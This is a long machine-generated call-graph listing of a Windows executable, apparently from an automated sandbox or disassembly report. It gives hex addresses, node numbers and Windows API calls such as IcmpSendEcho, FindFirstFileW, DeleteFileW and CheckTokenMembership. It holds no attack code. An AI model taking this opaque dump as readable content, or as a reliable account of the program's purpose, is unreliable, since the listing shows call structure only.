e8ec8c 100426->100442 100449 e8512d 7 API calls 100426->100449 100427 e808ed 100451 e83524 RaiseException 100427->100451 100428->100427 100450 e83524 RaiseException 100428->100450 100431 e8090a 100431->100419 100434 e8005b 100432->100434 100433 e8ec8c 21 API calls 100433->100434 100434->100433 100435 e8007a 100434->100435 100438 e8007c 100434->100438 100454 e8512d 7 API calls 100434->100454 100435->100416 100437 e808ed 100456 e83524 RaiseException 100437->100456 100438->100437 100455 e83524 RaiseException 100438->100455 100441 e8090a 100441->100416 100447 e93aa0 100442->100447 100443 e93ade 100453 e8f559 20 API calls 100443->100453 100445 e93ac9 RtlAllocateHeap 100446 e93adc 100445->100446 100445->100447 100446->100426 100447->100443 100447->100445 100452 e8512d 7 API calls 100447->100452 100449->100426 100450->100427 100451->100431 100452->100447 100453->100446 100454->100434 100455->100437 100456->100441 102279 ea2682 102282 e619e5 102279->102282 102283 ea29a8 DestroyWindow 102282->102283 102284 e61a24 mciSendStringW 102282->102284 102295 ea29b4 102283->102295 102285 e61a40 102284->102285 102286 e61c9b 102284->102286 102287 e61a4e 102285->102287 102285->102295 102286->102285 102288 e61caa UnregisterHotKey 102286->102288 102316 e61e03 102287->102316 102288->102286 102290 ea29f9 102296 ea2a1d 102290->102296 102297 ea2a0c FreeLibrary 102290->102297 102291 ea29d2 FindClose 102291->102295 102294 e61a63 102294->102296 102304 e61a71 102294->102304 102295->102290 102295->102291 102327 e6688b 102295->102327 102298 ea2a31 VirtualFree 102296->102298 102299 ea2a5f 102296->102299 102297->102290 102298->102296 102301 e61ade 102299->102301 102320 ed0957 102299->102320 102300 e61acd OleUninitialize 102300->102299 102300->102301 102302 ea2a79 102301->102302 102303 e61ae9 102301->102303 102310 ea2a88 102302->102310 102331 ed3b3b 6 API calls 102302->102331 102306 e61af9 102303->102306 102304->102300 102325 e61f19 VirtualFreeEx CloseHandle 102306->102325 102308 e61b0f 102308->102310 102312 e61bf4 102308->102312 102311 ea2b17 102310->102311 102332 ec6b72 22 API calls 102310->102332 102311->102311 102312->102311 102326 e61e4b CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 102312->102326 102314 e61c96 102317 e61e10 102316->102317 102318 e61a55 102317->102318 102333 ec76c8 22 API calls 102317->102333 102318->102290 102318->102294 102334 ed111d 102320->102334 102323 ed098a DeleteCriticalSection 102323->102301 102324 ed0976 102324->102323 102325->102308 102326->102314 102328 e668a4 102327->102328 102329 e66895 102327->102329 102328->102329 102330 e668a9 FindCloseChangeNotification 102328->102330 102329->102295 102330->102329 102331->102302 102332->102310 102333->102317 102335 ed0965 FindCloseChangeNotification 102334->102335 102336 ed1126 InterlockedExchange 102334->102336 102335->102324 102336->102335 102337 ed113a EnterCriticalSection TerminateThread WaitForSingleObject 102336->102337 102338 ed1174 InterlockedExchange LeaveCriticalSection 102337->102338 102339 ed1167 CloseHandle 102337->102339 102338->102335 102339->102338 102340 eb45c3 102351 e7de6f 102340->102351 102342 eb45d9 102343 eb4654 102342->102343 102360 e7a8f3 23 API calls 102342->102360 102345 e6c1f0 229 API calls 102343->102345 102349 eb46a0 102345->102349 102347 eb4634 102347->102349 102361 ed2289 22 API calls 102347->102361 102348 eb514a 102349->102348 102362 ed3dec 82 API calls 102349->102362 102352 e7de90 102351->102352 102353 e7de7d 102351->102353 102355 e7de95 102352->102355 102356 e7dec3 102352->102356 102354 e6a358 22 API calls 102353->102354 102359 e7de87 102354->102359 102358 e8005b 22 API calls 102355->102358 102357 e6a358 22 API calls 102356->102357 102357->102359 102358->102359 102359->102342 102360->102347 102361->102343 102362->102348 102363 eb3fc3 102367 ed188a 102363->102367 102365 eb3fce 102366 ed188a 53 API calls 102365->102366 102366->102365 102368 ed18c4 102367->102368 102373 ed1897 102367->102373 102368->102365 102369 ed18c6 102379 e7fc87 53 API calls 102369->102379 102370 ed18cb 102372 e67d90 53 API calls 102370->102372 102374 ed18d2 102372->102374 102373->102368 102373->102369 102373->102370 102376 ed18be 102373->102376 102375 e66a2c 22 API calls 102374->102375 102375->102368 102378 e6b390 39 API calls 102376->102378 102378->102368 102379->102370 100457 e6fd2f 100458 e6fd43 100457->100458 100464 e70295 100457->100464 100459 e6fd55 100458->100459 100460 e8005b 22 API calls 100458->100460 100461 eb459f 100459->100461 100463 e6fdae 100459->100463 100619 e6a358 100459->100619 100460->100459 100629 ed191f 22 API calls 100461->100629 100481 e6f30d 100463->100481 100553 e71990 100463->100553 100464->100459 100625 e6ad43 100464->100625 100468 eb529e 100633 ed3dec 82 API calls 100468->100633 100469 e70505 100476 e6ad43 22 API calls 100469->100476 100469->100481 100470 e8005b 22 API calls 100490 e6f1e6 100470->100490 100473 eb4c4e 100478 e6ad43 22 API calls 100473->100478 100473->100481 100474 eb51cd 100632 ed3dec 82 API calls 100474->100632 100476->100481 100478->100481 100480 e6addd 22 API calls 100480->100490 100483 e80323 29 API calls 100483->100490 100484 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100484->100490 100485 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100485->100490 100487 eb5088 100630 ed3dec 82 API calls 100487->100630 100488 e6f91e 100631 ed3dec 82 API calls 100488->100631 100490->100468 100490->100469 100490->100470 100490->100473 100490->100474 100490->100480 100490->100481 100490->100483 100490->100484 100490->100485 100490->100487 100490->100488 100491 e6ad43 22 API calls 100490->100491 100492 e70800 100490->100492 100618 e70cc0 41 API calls 100490->100618 100623 ee7e8b 54 API calls 100490->100623 100624 ee7fca 66 API calls 100490->100624 100491->100490 100493 e70826 100492->100493 100503 e7089e 100492->100503 100494 eb5ad3 100493->100494 100495 e70833 100493->100495 100665 ee83d7 229 API calls 100494->100665 100502 eb5af7 100495->100502 100504 e7083d 100495->100504 100497 eb5ac7 100664 ed3dec 82 API calls 100497->100664 100498 eb5b28 100505 eb5b33 100498->100505 100506 eb5b55 100498->100506 100502->100498 100509 eb5b0f 100502->100509 100510 eb5890 100503->100510 100515 eb587b 100503->100515 100518 e70a19 100503->100518 100527 e70a25 100503->100527 100537 e70964 100503->100537 100540 e709d2 100503->100540 100634 e6f1b0 100503->100634 100507 e70850 100504->100507 100508 e6ad43 22 API calls 100504->100508 100667 ee83d7 229 API calls 100505->100667 100668 ee5ee2 22 API calls 100506->100668 100519 e70893 100507->100519 100524 eb5d4c 100507->100524 100738 ee7e8b 54 API calls 100507->100738 100508->100507 100666 ed3dec 82 API calls 100509->100666 100510->100519 100510->100540 100662 ed3dec 82 API calls 100510->100662 100513 eb59f4 100513->100507 100526 e6ad43 22 API calls 100513->100526 100661 ed3dec 82 API calls 100515->100661 100516 eb5b60 100522 eb5bf4 100516->100522 100535 eb5b7b 100516->100535 100518->100527 100660 ed3dec 82 API calls 100518->100660 100519->100490 100670 ed18e3 22 API calls 100522->100670 100523 eb5d82 100528 e6a358 22 API calls 100523->100528 100524->100523 100762 ee7fca 66 API calls 100524->100762 100526->100507 100527->100490 100528->100519 100529 eb5d2a 100739 e67d90 100529->100739 100530 eb5d60 100532 e67d90 53 API calls 100530->100532 100546 eb5d68 100532->100546 100669 ed1296 22 API calls 100535->100669 100536 eb5c06 100539 e6ab97 22 API calls 100536->100539 100537->100518 100659 e70b10 22 API calls 100537->100659 100543 eb5c0f 100539->100543 100540->100497 100540->100507 100540->100513 100540->100519 100663 e7b1e7 229 API calls 100540->100663 100541 e709c5 100541->100518 100541->100540 100671 ed1296 22 API calls 100543->100671 100544 eb5d32 100544->100524 100547 e6a358 22 API calls 100544->100547 100545 eb5ba5 100548 e71990 229 API calls 100545->100548 100546->100523 100549 e6a358 22 API calls 100546->100549 100547->100524 100548->100507 100549->100523 100551 eb5c28 100672 e6c1f0 100551->100672 100554 e719f6 100553->100554 100555 e71e30 100553->100555 100556 eb6b4b 100554->100556 100557 e71a10 100554->100557 101027 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100555->101027 101031 ee78f5 229 API calls 100556->101031 100859 e71fa0 100557->100859 100561 e71e3a 100564 e71e7b 100561->100564 100566 e6a1b9 22 API calls 100561->100566 100563 eb6b57 100563->100490 100568 eb6b60 100564->100568 100570 e71eac 100564->100570 100565 e71fa0 9 API calls 100567 e71a36 100565->100567 100574 e71e54 100566->100574 100567->100564 100569 e71a6c 100567->100569 101032 ed3dec 82 API calls 100568->101032 100569->100568 100593 e71a88 100569->100593 100571 e6a358 22 API calls 100570->100571 100573 e71eb9 100571->100573 101029 e7e183 229 API calls 100573->101029 101028 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100574->101028 100577 eb6b88 101033 ed3dec 82 API calls 100577->101033 100579 e71baf 100580 eb6beb 100579->100580 100581 e71bbc 100579->100581 101035 ee5f9e 54 API calls 100580->101035 100582 e71fa0 9 API calls 100581->100582 100584 e71bc9 100582->100584 100587 eb6d14 100584->100587 100590 e71fa0 9 API calls 100584->100590 100585 e8005b 22 API calls 100585->100593 100586 e8008b 22 API calls 100586->100593 100597 eb6b83 100587->100597 101036 ed3dec 82 API calls 100587->101036 100588 e71ef2 101030 e7fd4f 22 API calls 100588->101030 100595 e71be3 100590->100595 100592 e6f1b0 229 API calls 100592->100593 100593->100573 100593->100577 100593->100579 100593->100585 100593->100586 100593->100592 100594 eb6bcc 100593->100594 100593->100597 101034 ed3dec 82 API calls 100594->101034 100595->100587 100598 e6ad43 22 API calls 100595->100598 100600 e71c47 100595->100600 100597->100490 100598->100600 100599 e71fa0 9 API calls 100599->100600 100600->100587 100600->100588 100600->100597 100600->100599 100602 e71cfb 100600->100602 100869 ed5dcb 100600->100869 100901 edff67 100600->100901 100904 e672b0 100600->100904 100907 eea3ae 100600->100907 100913 eeec0e 100600->100913 100934 ed6457 100600->100934 100941 eea7a8 100600->100941 100949 edf945 100600->100949 100958 ee0db4 100600->100958 100983 ed64aa 100600->100983 100988 e7aac9 100600->100988 101007 edf746 100600->101007 101016 ee9de4 100600->101016 101019 ee1654 100600->101019 100601 e71d9d 100601->100490 100602->100601 101026 e7ddbc 22 API calls 100602->101026 100618->100490 100620 e6a36c 100619->100620 100621 e6a366 100619->100621 100620->100459 100621->100620 100622 e6ad43 22 API calls 100621->100622 100622->100620 100623->100490 100624->100490 100626 e6ad57 100625->100626 100628 e6ad66 100625->100628 100627 e8008b 22 API calls 100626->100627 100626->100628 100627->100628 100628->100459 100629->100481 100630->100488 100631->100481 100632->100481 100633->100481 100649 e6f1e6 100634->100649 100635 e80323 29 API calls 100635->100649 100636 eb529e 100769 ed3dec 82 API calls 100636->100769 100637 e70505 100643 e6ad43 22 API calls 100637->100643 100650 e6f30d 100637->100650 100640 eb4c4e 100646 e6ad43 22 API calls 100640->100646 100640->100650 100641 eb51cd 100768 ed3dec 82 API calls 100641->100768 100643->100650 100645 e6ad43 22 API calls 100645->100649 100646->100650 100647 e70800 229 API calls 100647->100649 100648 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100648->100649 100649->100635 100649->100636 100649->100637 100649->100640 100649->100641 100649->100645 100649->100647 100649->100648 100649->100650 100651 e8005b 22 API calls 100649->100651 100652 e6addd 22 API calls 100649->100652 100654 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100649->100654 100656 eb5088 100649->100656 100658 e6f91e 100649->100658 100763 e70cc0 41 API calls 100649->100763 100764 ee7e8b 54 API calls 100649->100764 100765 ee7fca 66 API calls 100649->100765 100650->100503 100651->100649 100652->100649 100654->100649 100766 ed3dec 82 API calls 100656->100766 100767 ed3dec 82 API calls 100658->100767 100659->100541 100660->100519 100661->100510 100662->100540 100663->100540 100664->100494 100665->100507 100666->100519 100667->100507 100668->100516 100669->100545 100670->100536 100671->100551 100770 e6b060 100672->100770 100675 eb08eb 100675->100507 100677 eb09f0 100678 eb0935 100687 eb09f5 100678->100687 100692 eb0999 100678->100692 100703 eb08f3 100678->100703 100679 eb0aa3 100679->100677 100686 e6c3a5 100679->100686 100784 ee5f9e 54 API calls 100679->100784 100680 eb0f07 100680->100677 100820 ed3dec 82 API calls 100680->100820 100681 e6c396 100681->100679 100681->100686 100782 ec77be 22 API calls 100681->100782 100683 e6cd26 100690 e8008b 22 API calls 100683->100690 100686->100680 100693 e8005b 22 API calls 100686->100693 100702 e6c423 100686->100702 100780 ed3dec 82 API calls 100687->100780 100688 e8005b 22 API calls 100707 e6c24e 100688->100707 100689 eb0a52 100783 ec7737 22 API calls 100689->100783 100700 e6cd54 100690->100700 100778 e7e183 229 API calls 100692->100778 100695 e6c3f9 100693->100695 100695->100702 100775 e6b19d 22 API calls 100695->100775 100696 eb0a7c 100699 e6f1b0 229 API calls 100696->100699 100698 eb0ad4 100698->100686 100785 ec77be 22 API calls 100698->100785 100699->100679 100704 e8008b 22 API calls 100700->100704 100705 eb0b8e 100702->100705 100730 e6c447 100702->100730 100786 e6b21b 100702->100786 100703->100677 100779 ed3dec 82 API calls 100703->100779 100704->100730 100709 eb0b9f 100705->100709 100710 e6b21b 22 API calls 100705->100710 100707->100677 100707->100678 100707->100681 100707->100683 100707->100688 100707->100692 100707->100700 100707->100703 100711 e6f1b0 229 API calls 100707->100711 100715 eb0a18 100707->100715 100707->100730 100734 e6cf70 100707->100734 100709->100730 100794 e7b93d 22 API calls 100709->100794 100710->100709 100711->100707 100714 eb0d32 100717 e6f1b0 229 API calls 100714->100717 100781 ed3dec 82 API calls 100715->100781 100719 eb0d5c 100717->100719 100719->100677 100813 e6ac97 100719->100813 100720 eb0d87 100817 ed3dec 82 API calls 100720->100817 100724 e6bdf0 40 API calls 100724->100730 100725 e6a358 22 API calls 100725->100730 100726 e8008b 22 API calls 100726->100730 100727 e8005b 22 API calls 100727->100730 100728 eb0eec 100819 ec53e8 22 API calls 100728->100819 100730->100680 100730->100703 100730->100714 100730->100720 100730->100724 100730->100725 100730->100726 100730->100727 100730->100728 100731 e6ad43 22 API calls 100730->100731 100732 e6b21b 22 API calls 100730->100732 100733 e6ca89 100730->100733 100730->100734 100736 e6c81c 100730->100736 100795 ecf77e 40 API calls 100730->100795 100796 e6ae0f 100730->100796 100818 ed3a59 22 API calls 100730->100818 100731->100730 100732->100730 100733->100507 100777 ed3dec 82 API calls 100734->100777 100735 e6c833 100735->100507 100736->100735 100776 e7dda4 22 API calls 100736->100776 100738->100529 100740 e67da5 100739->100740 100741 e67da2 100739->100741 100742 e67dad 100740->100742 100743 e67ddb 100740->100743 100741->100544 100849 e85446 26 API calls 100742->100849 100744 ea5b04 100743->100744 100747 e67ded 100743->100747 100755 ea5a1d 100743->100755 100858 e85403 26 API calls 100744->100858 100856 e7fd85 51 API calls 100747->100856 100748 e67dbd 100751 e8005b 22 API calls 100748->100751 100749 ea5b1c 100749->100749 100753 e67dc7 100751->100753 100850 e6a1b9 100753->100850 100754 ea5a96 100857 e7fd85 51 API calls 100754->100857 100755->100754 100757 e8008b 22 API calls 100755->100757 100758 ea5a66 100757->100758 100759 e8005b 22 API calls 100758->100759 100760 ea5a8d 100759->100760 100761 e6a1b9 22 API calls 100760->100761 100761->100754 100762->100530 100763->100649 100764->100649 100765->100649 100766->100658 100767->100650 100768->100650 100769->100650 100771 e6b071 100770->100771 100774 e6b08c 100770->100774 100821 e6b139 100771->100821 100773 e6b079 CharUpperBuffW 100773->100774 100774->100707 100775->100702 100776->100736 100777->100675 100778->100703 100779->100677 100780->100677 100781->100677 100782->100689 100783->100696 100784->100698 100785->100698 100787 e6b229 100786->100787 100793 e6b251 100786->100793 100788 e6b237 100787->100788 100790 e6b21b 22 API calls 100787->100790 100789 e6b23d 100788->100789 100791 e6b21b 22 API calls 100788->100791 100789->100793 100827 e6b650 100789->100827 100790->100788 100791->100789 100793->100705 100794->100730 100795->100730 100832 e6bdf0 100796->100832 100798 e6ae1f 100799 eafd29 100798->100799 100800 e6ae2d 100798->100800 100801 e6a358 22 API calls 100799->100801 100802 e8005b 22 API calls 100800->100802 100803 eafd34 100801->100803 100804 e6ae3e 100802->100804 100840 e6addd 100804->100840 100807 e6ae57 100809 e8005b 22 API calls 100807->100809 100808 e6ad43 22 API calls 100808->100807 100810 e6ae61 100809->100810 100845 e6ace5 40 API calls 100810->100845 100812 e6ae85 100812->100730 100814 e6aca2 100813->100814 100815 e6acd1 100814->100815 100816 e6ae0f 40 API calls 100814->100816 100815->100720 100816->100815 100817->100677 100818->100730 100819->100680 100820->100677 100822 e6b14c 100821->100822 100823 e6b149 100821->100823 100824 e8005b 22 API calls 100822->100824 100823->100773 100825 e6b157 100824->100825 100826 e8008b 22 API calls 100825->100826 100826->100823 100828 e6b65b 100827->100828 100830 e6b696 100828->100830 100831 e7ddbc 22 API calls 100828->100831 100830->100793 100831->100830 100833 e6c037 100832->100833 100838 e6be03 100832->100838 100833->100798 100835 e6addd 22 API calls 100835->100838 100836 e6bead 100836->100798 100838->100835 100838->100836 100846 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100838->100846 100847 e80323 29 API calls 100838->100847 100848 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100838->100848 100841 e8008b 22 API calls 100840->100841 100842 e6adf2 100841->100842 100843 e8005b 22 API calls 100842->100843 100844 e6ae00 100843->100844 100844->100807 100844->100808 100845->100812 100846->100838 100847->100838 100848->100838 100849->100748 100851 e6a1c8 100850->100851 100852 e8008b 22 API calls 100851->100852 100853 e6a1f0 100852->100853 100854 e8005b 22 API calls 100853->100854 100855 e6a206 100854->100855 100855->100741 100856->100748 100857->100744 100858->100749 100860 e71fe1 100859->100860 100867 e71fbd 100859->100867 101037 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100860->101037 100861 e71a20 100861->100565 100863 e71feb 100863->100867 101038 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100863->101038 100865 e78d87 100865->100861 101040 e80478 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100865->101040 100867->100861 101039 e804c2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100867->101039 100870 ed5dea 100869->100870 100871 ed5eb3 100869->100871 101084 e6b7fd 100870->101084 100874 e67d90 53 API calls 100871->100874 100883 ed5f07 100871->100883 100873 ed5df5 100875 e6b7fd 39 API calls 100873->100875 100876 ed5ee5 100874->100876 100877 ed5e0b 100875->100877 100878 e67d90 53 API calls 100876->100878 100877->100871 100880 e6addd 22 API calls 100877->100880 100879 ed5ef7 100878->100879 101041 ecd72c 100879->101041 100882 ed5e1c 100880->100882 100884 e6addd 22 API calls 100882->100884 100883->100600 100885 ed5e25 100884->100885 100886 e67d90 53 API calls 100885->100886 100887 ed5e32 100886->100887 101089 e657ec 100887->101089 101321 ec1ced AllocateAndInitializeSid 100901->101321 100903 edff6f 100903->100600 100905 e8005b 22 API calls 100904->100905 100906 e672bd 100905->100906 100906->100600 100909 eea3c1 100907->100909 100908 e67d90 53 API calls 100910 eea42e 100908->100910 100909->100908 100912 eea3d0 100909->100912 101324 ed16b4 100910->101324 100912->100600 100914 e67d90 53 API calls 100913->100914 100915 eeec29 100914->100915 101365 e6694c 100915->101365 100918 eeec6c 100921 e6a1b9 22 API calls 100918->100921 100919 e6b7fd 39 API calls 100920 eeec49 100919->100920 100920->100918 100922 eeec4e 100920->100922 100925 eeec83 100921->100925 100923 eeec5e 100922->100923 100924 e6ad43 22 API calls 100922->100924 101382 e66991 22 API calls 100923->101382 100924->100923 100928 e6addd 22 API calls 100925->100928 100927 eeed56 100927->100600 100929 eeeccb 100928->100929 100931 eeed02 100929->100931 101370 ec96ec 100929->101370 101376 e656ec 100929->101376 100931->100923 100933 e66a2c 22 API calls 100931->100933 100933->100931 100935 e67d90 53 API calls 100934->100935 100936 ed646d 100935->100936 101395 ecda5f 100936->101395 100938 ed6475 100939 ed6479 GetLastError 100938->100939 100940 ed648e 100938->100940 100939->100940 100940->100600 100942 eea7c4 100941->100942 100945 eea804 100941->100945 100942->100600 100943 eea88a 101419 ed017d 100943->101419 100944 eea822 100944->100942 100944->100943 100946 e6b7fd 39 API calls 100944->100946 100945->100944 100947 e6b7fd 39 API calls 100945->100947 100946->100943 100947->100944 100950 e67d90 53 API calls 100949->100950 100951 edf97f 100950->100951 101478 e6a400 100951->101478 100953 edf9b4 100957 edf9b8 100953->100957 101505 e659db 22 API calls 100953->101505 100954 edf98f 100954->100953 100955 e6f1b0 229 API calls 100954->100955 100955->100953 100957->100600 100959 ee0ddd 100958->100959 100960 ee0e0b WSAStartup 100959->100960 100962 e6b7fd 39 API calls 100959->100962 100961 ee0e50 100960->100961 100982 ee0e1f 100960->100982 101534 e67e72 100961->101534 100965 ee0df8 100962->100965 100965->100960 100967 e6b7fd 39 API calls 100965->100967 100966 e67d90 53 API calls 100968 ee0e65 100966->100968 100969 ee0e07 100967->100969 101539 e7fabb WideCharToMultiByte 100968->101539 100969->100960 100971 ee0e71 inet_addr gethostbyname 100972 ee0e8f IcmpCreateFile 100971->100972 100971->100982 100973 ee0ecf 100972->100973 100972->100982 100974 e8008b 22 API calls 100973->100974 100975 ee0ee8 100974->100975 101547 e63257 100975->101547 100978 ee0efe IcmpSendEcho 100980 ee0f48 100978->100980 100979 ee0f27 IcmpSendEcho 100979->100980 100981 ee100e IcmpCloseHandle WSACleanup 100980->100981 100981->100982 100982->100600 100984 e67d90 53 API calls 100983->100984 100985 ed64bd 100984->100985 100986 ece27d 4 API calls 100985->100986 100987 ed64c7 100986->100987 100987->100600 100989 e67d90 53 API calls 100988->100989 100990 e7aaf3 100989->100990 101552 e7bae3 100990->101552 100992 e7ab0a 100993 e6b7fd 39 API calls 100992->100993 100995 e7af26 100992->100995 100993->100995 100994 e7ba49 43 API calls 100994->100995 100995->100994 100997 e6694c 22 API calls 100995->100997 100999 e69c10 22 API calls 100995->100999 101000 e659db 22 API calls 100995->101000 101001 e6b7fd 39 API calls 100995->101001 101002 e7b086 100995->101002 101003 e67d90 53 API calls 100995->101003 101004 e673e7 22 API calls 100995->101004 101557 e62874 100995->101557 101567 e62810 100995->101567 101571 e84ca8 40 API calls 100995->101571 101572 e66991 22 API calls 100995->101572 100997->100995 100999->100995 101000->100995 101001->100995 101002->100600 101003->100995 101004->100995 101008 e8008b 22 API calls 101007->101008 101009 edf757 101008->101009 101010 e63257 22 API calls 101009->101010 101011 edf761 101010->101011 101012 e67d90 53 API calls 101011->101012 101013 edf778 GetEnvironmentVariableW 101012->101013 101610 ed141a 22 API calls 101013->101610 101015 edf795 101015->100600 101611 ee87b2 101016->101611 101018 ee9df4 101018->100600 101020 e6b7fd 39 API calls 101019->101020 101021 ee1668 101020->101021 101022 e6b7fd 39 API calls 101021->101022 101025 ee16a5 101021->101025 101022->101025 101023 ee16c8 101023->100600 101024 e6a358 22 API calls 101024->101023 101025->101023 101025->101024 101026->100602 101027->100561 101028->100564 101029->100588 101030->100588 101031->100563 101032->100597 101033->100597 101034->100597 101035->100595 101036->100597 101037->100863 101038->100867 101039->100865 101040->100861 101042 e6addd 22 API calls 101041->101042 101043 ecd749 101042->101043 101044 e6addd 22 API calls 101043->101044 101045 ecd751 101044->101045 101046 e6addd 22 API calls 101045->101046 101047 ecd759 101046->101047 101144 e6462f 101047->101144 101050 e6462f 23 API calls 101051 ecd76d 101050->101051 101154 ece84e 101051->101154 101085 e6b815 101084->101085 101086 e6b80e 101084->101086 101085->100873 101086->101085 101282 e86551 39 API calls 101086->101282 101088 e6b858 101088->100873 101090 e6addd 22 API calls 101089->101090 101091 e65802 101090->101091 101092 e6addd 22 API calls 101091->101092 101093 e6580a 101092->101093 101094 e6addd 22 API calls 101093->101094 101095 e65812 101094->101095 101096 e6addd 22 API calls 101095->101096 101097 e6581a 101096->101097 101098 e6584e 101097->101098 101099 ea4635 101097->101099 101101 e675ac 22 API calls 101098->101101 101100 e6ad43 22 API calls 101099->101100 101102 ea463e 101100->101102 101103 e6585c 101101->101103 101104 e6abe7 22 API calls 101102->101104 101105 e68645 22 API calls 101103->101105 101108 e65891 101104->101108 101106 e65866 101105->101106 101106->101108 101109 e675ac 22 API calls 101106->101109 101107 e658d6 101283 e675ac 101107->101283 101108->101107 101110 e658b2 101108->101110 101127 ea4660 101108->101127 101112 e65887 101109->101112 101110->101107 101115 e65200 22 API calls 101110->101115 101114 e68645 22 API calls 101112->101114 101114->101108 101118 e658bf 101115->101118 101118->101107 101123 e675ac 22 API calls 101118->101123 101119 e673e7 22 API calls 101128 ea4720 101119->101128 101123->101107 101126 e65200 22 API calls 101126->101128 101127->101119 101128->101107 101128->101126 101296 e69c10 101128->101296 101236 ea21d0 101144->101236 101147 e64676 101150 e6abe7 22 API calls 101147->101150 101148 e6465b 101242 e673e7 101148->101242 101151 e64667 101150->101151 101238 e66925 101151->101238 101155 e6addd 22 API calls 101154->101155 101156 ece863 101155->101156 101157 e6addd 22 API calls 101156->101157 101158 ece86b 101157->101158 101159 e657ec 22 API calls 101158->101159 101160 ece87a 101159->101160 101237 e6463c GetFullPathNameW 101236->101237 101237->101147 101237->101148 101239 e66933 101238->101239 101254 e68645 101239->101254 101241 e64673 101241->101050 101243 e673f7 101242->101243 101244 ea55af 101242->101244 101247 e67432 101243->101247 101248 e6740d 101243->101248 101245 e68645 22 API calls 101244->101245 101246 ea55b8 101245->101246 101246->101246 101250 e8005b 22 API calls 101247->101250 101258 e677bb 101248->101258 101252 e6743e 101250->101252 101251 e67415 101251->101151 101253 e8008b 22 API calls 101252->101253 101253->101251 101255 e68653 101254->101255 101257 e6865c 101254->101257 101256 e6b139 22 API calls 101255->101256 101255->101257 101256->101257 101257->101241 101259 e677cd 101258->101259 101260 e677d3 101258->101260 101259->101251 101261 e8008b 22 API calls 101260->101261 101261->101259 101282->101088 101284 e675bb 101283->101284 101285 e67618 101283->101285 101284->101285 101287 e675c6 101284->101287 101286 e68645 22 API calls 101285->101286 101292 e675e9 101286->101292 101288 ea56ab 101287->101288 101289 e675e1 101287->101289 101291 e677bb 22 API calls 101289->101291 101291->101292 101297 eaf54b 101296->101297 101298 e69c28 101296->101298 101299 e8005b 22 API calls 101297->101299 101298->101297 101301 e69c32 101298->101301 101322 ec1d44 101321->101322 101323 ec1d23 CheckTokenMembership FreeSid 101321->101323 101322->100903 101323->101322 101325 ed16c1 101324->101325 101326 e8005b 22 API calls 101325->101326 101327 ed16c8 101326->101327 101330 ecfac0 101327->101330 101329 ed1702 101329->100912 101331 e6b139 22 API calls 101330->101331 101332 ecfad3 CharLowerBuffW 101331->101332 101337 ecfae6 101332->101337 101333 e65200 22 API calls 101333->101337 101334 ecfb24 101335 ecfb36 101334->101335 101338 e65200 22 API calls 101334->101338 101336 e8008b 22 API calls 101335->101336 101341 ecfb64 101336->101341 101337->101333 101337->101334 101347 ecfaf0 101337->101347 101338->101335 101343 ecfb86 101341->101343 101363 ecf9f8 22 API calls 101341->101363 101342 ecfbc3 101344 e8005b 22 API calls 101342->101344 101342->101347 101348 ecfc17 101343->101348 101345 ecfbdd 101344->101345 101346 e8008b 22 API calls 101345->101346 101346->101347 101347->101329 101349 e6addd 22 API calls 101348->101349 101350 ecfc49 101349->101350 101351 e6addd 22 API calls 101350->101351 101352 ecfc52 101351->101352 101353 e6addd 22 API calls 101352->101353 101356 ecfc5b 101353->101356 101354 e673e7 22 API calls 101354->101356 101355 ecff1f 101355->101342 101356->101354 101356->101355 101357 e86608 GetStringTypeW 101356->101357 101359 e86551 39 API calls 101356->101359 101360 ecfc17 41 API calls 101356->101360 101361 e69c10 22 API calls 101356->101361 101362 e6ad43 22 API calls 101356->101362 101364 e86632 GetStringTypeW 101356->101364 101357->101356 101359->101356 101360->101356 101361->101356 101362->101356 101363->101341 101364->101356 101366 e8008b 22 API calls 101365->101366 101367 e66971 101366->101367 101368 e8005b 22 API calls 101367->101368 101369 e6697f 101368->101369 101369->100918 101369->100919 101371 ec9705 101370->101371 101372 ec96f7 101370->101372 101383 e67717 101371->101383 101373 e68645 22 API calls 101372->101373 101375 ec9703 101373->101375 101375->100929 101377 e656fb 101376->101377 101381 e6571c 101376->101381 101379 e8008b 22 API calls 101377->101379 101378 e8005b 22 API calls 101380 e6572f 101378->101380 101379->101381 101380->100929 101381->101378 101382->100927 101384 e6772a 101383->101384 101385 e677ab 101383->101385 101384->101385 101387 e67736 101384->101387 101386 e68645 22 API calls 101385->101386 101392 e67748 101386->101392 101388 e67740 101387->101388 101389 e6776e 101387->101389 101390 e677bb 22 API calls 101388->101390 101391 e8005b 22 API calls 101389->101391 101390->101392 101393 e67778 101391->101393 101392->101375 101394 e8008b 22 API calls 101393->101394 101394->101392 101396 e6addd 22 API calls 101395->101396 101397 ecda7e 101396->101397 101398 e6addd 22 API calls 101397->101398 101399 ecda87 101398->101399 101400 e6addd 22 API calls 101399->101400 101401 ecda90 101400->101401 101402 e6462f 23 API calls 101401->101402 101403 ecda9b 101402->101403 101404 ece8bb GetFileAttributesW 101403->101404 101405 ecdaa4 101404->101405 101406 ecdab6 101405->101406 101407 e65954 22 API calls 101405->101407 101408 e657ec 22 API calls 101406->101408 101407->101406 101409 ecdaca FindFirstFileW 101408->101409 101410 ecdb56 FindClose 101409->101410 101412 ecdae9 101409->101412 101415 ecdb61 101410->101415 101411 ecdb31 FindNextFileW 101411->101412 101412->101410 101412->101411 101413 e6ad43 22 API calls 101412->101413 101414 e66a2c 22 API calls 101412->101414 101416 e65954 22 API calls 101412->101416 101413->101412 101414->101412 101415->100938 101417 ecdb22 DeleteFileW 101416->101417 101417->101411 101418 ecdb4d FindClose 101417->101418 101418->101415 101451 ed00b5 101419->101451 101421 ed01a4 